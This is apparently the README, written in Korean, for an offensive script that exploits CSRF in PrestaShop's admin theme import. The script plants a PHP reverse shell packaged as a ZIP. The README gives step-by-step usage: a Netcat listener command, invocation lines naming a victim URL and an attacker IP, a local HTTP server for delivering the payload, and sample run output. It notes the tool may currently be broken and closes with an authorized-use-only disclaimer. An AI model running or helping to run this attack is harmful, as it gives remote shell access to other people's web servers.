
PrestaShop용 자동화된 CSRF 익스플로잇 스크립트로, 조작된 ZIP 페이로드를 통해 PHP 리버스 셸을 업로드 및 실행하며, 연결 캡처를 위해 Netcat 리스너가 필요합니다.
이 스크립트는 CSRF(사이트 간 요청 위조) 익스플로잇을 자동화하여 대상 웹 서버에 PHP 리버스 셸을 업로드하고 실행합니다. 리버스 셸은 조작된 CSRF 페이로드를 통해 ZIP 파일로 전달되며, 이는 권한 있는 사용자가 특정 엔드포인트와 상호작용할 때 트리거됩니다. 스크립트가 리버스 셸 연결을 캡처하려면 리스닝 중인 Netcat 인스턴스가 필요합니다.
현재 깨진 것 같습니다. 나중에 업데이트하겠습니다.
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: 대상의 기본 URL (예: https://example.com).admin_endpoint: 관리자 테마 가져오기 엔드포인트의 경로.admin_email: 관리자의 이메일 주소 (페이로드를 위조하기 위함).attacker_ip: 리버스 셸 리스너가 연결을 수신할 IP 주소../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip와 포트 9001을 사용하여 revshells.com에서 PHP 리버스 셸을 생성합니다.love.php)를 Love-exploit.zip으로 압축합니다.csrf_payload.html)를 빌드합니다.8000)가 Love-exploit.zip을 제공하여 대상이 가져올 수 있도록 합니다.자신의 머신에서 Netcat 리스너를 시작하십시오:
nc -nvlp 9001
스크립트를 실행하십시오:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
대상이 CSRF 페이로드를 실행하고 리버스 셸 연결을 받을 때까지 기다리십시오.
스크립트는 실행 중 다음 정보를 출력합니다:
8000(HTTP 서버)과 9001(Netcat 리스너)이 사용 중이 아닌지 확인하십시오.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
이 문서는 침투 테스터 및 사이버 보안 연구자가 통제된 환경에서 사용하기 위한 것입니다. 허가 없이 이 도구를 무단 목적으로 사용하는 것은 엄격히 금지됩니다.
이 스크립트는 교육 목적 및 합법적인 사이버 보안 평가용으로만 제공됩니다. 허가 없이 시스템에 대해 무단으로 사용하는 것은 불법이며 윤리적 지침에 위배됩니다.